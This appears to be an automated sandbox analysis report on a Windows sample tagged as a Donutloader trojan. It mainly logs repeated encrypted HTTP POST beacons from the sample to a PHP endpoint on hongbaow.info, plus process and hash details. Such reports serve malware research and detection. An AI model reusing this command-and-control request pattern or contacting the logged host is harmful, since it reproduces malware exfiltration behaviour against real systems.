                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4As5BhX%2BADoSKtlQebe9AUKp2YeS%2FxGKkj%2FapQUexs0w3s%2FNjt59rBM05k%2FUkYjxNsUZ2paXoFoHyItQcQx0OO%2F9bxb37doea3kjZlJESYi8KEYj1RE6jg9j%2BM1F8haM"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de043dbbf4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1572&rtt_var=599&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1813664&cwnd=180&unsent_bytes=0&cid=c27573eeffe54c17&ts=364&x=0"
                            2025-01-22 07:36:58 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            85192.168.2.450088104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:58 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:58 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:36:59 UTC813INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:59 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJwz66aPjBudRgwco%2FH9tBSuJx%2BWK2iSdE70kGanc7yVBgSKy6ja7iJ650DARrGl%2Fm7sQ%2BGn%2FUEkfhZtLPCm2ehPxLtiHfoEh%2BWCrV6Z2mHGopmeKdmj8XJzM9BFjc3Q"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de048f814de95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1460&rtt_var=555&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1958417&cwnd=246&unsent_bytes=0&cid=d552412473e3ed27&ts=323&x=0"
                            2025-01-22 07:36:59 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            86192.168.2.450089104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:59 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 313
                            Cache-Control: no-cache
                            2025-01-22 07:36:59 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                            Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                            2025-01-22 07:36:59 UTC814INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:36:59 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FENb%2FTWELkSLlNXADsrl86qlmfv%2FJXGfTBRhOdrqBlPVvQWgo7wWCD9iVoj0uocSaOvIi7H09GZCc%2BNB4CL7MoiOSE%2B67zxHeJHa2WB%2BZPrsCV7GTDg7eyxVwkJVMBG3"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de04b4a05c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1471&rtt_var=563&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1923583&cwnd=155&unsent_bytes=0&cid=6487369777312c64&ts=349&x=0"
                            2025-01-22 07:36:59 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            87192.168.2.450090104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:36:59 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:36:59 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:37:00 UTC807INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:37:00 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0mleIlw76cSJbJzldIZMC4gyUI9wXu%2BAjFspKZ33UX3TON5rgv3ZQefe7oBgvNh3M7MEpnLXpeCiwyw%2BSfMSZwJJu0MnskdY9L3C%2FZ79NJsI2A1cdNob20rNx9xRL3mv"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de04e0ccade95-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1437&rtt_var=550&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1968981&cwnd=246&unsent_bytes=0&cid=9416b15cba9ba0cc&ts=319&x=0"
                            2025-01-22 07:37:00 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            88192.168.2.450091104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:37:00 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:37:00 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:37:00 UTC803INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:37:00 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MzBrwvI7sAwa5JXGs4npF325HBzuIBYCRxliZmm3cS8kOm3RCttFSyMxxOWbCDA527FBAx3wpV4U10cYLEl7U4tUjLcZzFT5Mor5hSYBusUQScUn%2BZTFHK3wFNk77X4E"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de0531c78c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1461&rtt_var=559&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1936339&cwnd=155&unsent_bytes=0&cid=3975b0040e78e968&ts=324&x=0"
                            2025-01-22 07:37:00 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            89192.168.2.450092104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:37:01 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:37:01 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:37:01 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:37:01 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O13zCAP3q4LjvLtW%2BDNLqif%2BTNvz2EUv8tMXakdqmTS0K3kz2HaS%2FXICZEvDSRuhc97uCQ1Q5pNJ5gfpBFWM66NWXtU%2B90dzog90Bzib198thWulKRG5rTRlZvHsyJx8"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de058190242eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1545&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1805813&cwnd=215&unsent_bytes=0&cid=d482b94114fb5912&ts=323&x=0"
                            2025-01-22 07:37:01 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            90192.168.2.450093104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:37:02 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:37:02 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:37:02 UTC805INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:37:02 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRITVrOseMM43SGZjXWjJhy0peNlrXzmFDlO27ipCmlHs8DYqy22P8MhYjP6zUXpkodinnvCMpYYPztl55kNl%2FXBC%2BVGKREiXv6H6kyFKIdqvbAbP13IbvqWO4HgA4HB"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de05d2af642eb-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1572&rtt_var=591&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1848101&cwnd=215&unsent_bytes=0&cid=8d581537aa24afb3&ts=322&x=0"
                            2025-01-22 07:37:02 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            91192.168.2.450094104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:37:03 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:37:03 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:37:03 UTC815INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:37:03 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UxU5UXInp%2BagA7yOsPfzC7uoJJ6pimLsj%2FFfVhWvpGIpT2cGNUlhY2f6lfYJfpSQWgsfh4Nfjd09j%2B5RKQUGid%2BRnq3VYCPPQGQtzRx0%2B%2BH26prwP4D%2FvWZOIUTgvHn4"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de0623be48ca5-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1746&rtt_var=670&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1613259&cwnd=237&unsent_bytes=0&cid=be5329150f8b521e&ts=315&x=0"
                            2025-01-22 07:37:03 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            92192.168.2.450095104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:37:03 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:37:03 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:37:04 UTC811INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:37:04 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2FbZSo15JBYgAgFo3pbmdicigitKTovKjR3iStVqGwwn40Pf2D24WGhgICc1%2Fw%2BRGA9TjEbIJGoXvdgZjmfnzP%2FhukUQ9lrDut52z%2FkGU5eNj4BRLEPe1FHwtXaSb7g9"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de0673abc4414-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1629&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1741204&cwnd=180&unsent_bytes=0&cid=2db4e59b0381c97f&ts=316&x=0"
                            2025-01-22 07:37:04 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            93192.168.2.450096104.21.64.14437092C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            TimestampBytes transferredDirectionData
                            2025-01-22 07:37:04 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0
                            Host: hongbaow.info
                            Content-Length: 96
                            Cache-Control: no-cache
                            2025-01-22 07:37:04 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                            Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                            2025-01-22 07:37:04 UTC809INHTTP/1.1 200 OK
                            Date: Wed, 22 Jan 2025 07:37:04 GMT
                            Content-Type: text/html; charset=utf-8
                            Transfer-Encoding: chunked
                            Connection: close
                            X-Powered-By: PHP/7.4.33
                            cf-cache-status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zH65H7355%2FpvrExPklZe2ROonzFjLDlSsO9okDxNPTtU1W2KHVc8ZyuOOKT5y0kTb0E%2FJJl9DeEMt2cg9zYU7J1dQgZMRGP%2BlN5PiTEikCWchdGTELz3GyXH7ckJs5%2BI"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 905de06c3c70c358-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1493&min_rtt=1491&rtt_var=564&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1931216&cwnd=155&unsent_bytes=0&cid=ed83888dbb0f8d12&ts=322&x=0"
                            2025-01-22 07:37:04 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:02:34:59
                            Start date:22/01/2025
                            Path:C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\jhdfer3s_jh3de.exe"
                            Imagebase:0x180000
                            File size:585'728 bytes
                            MD5 hash:446FEE24759B2800C4EE7851930F07AA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2936750327.0000000001220000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2936607308.000000000102E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            Reputation:low
                            Has exited:false

                            General

                            Target ID:1
                            Start time:02:34:59
                            Start date:22/01/2025
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Disassembly

                            Reset < >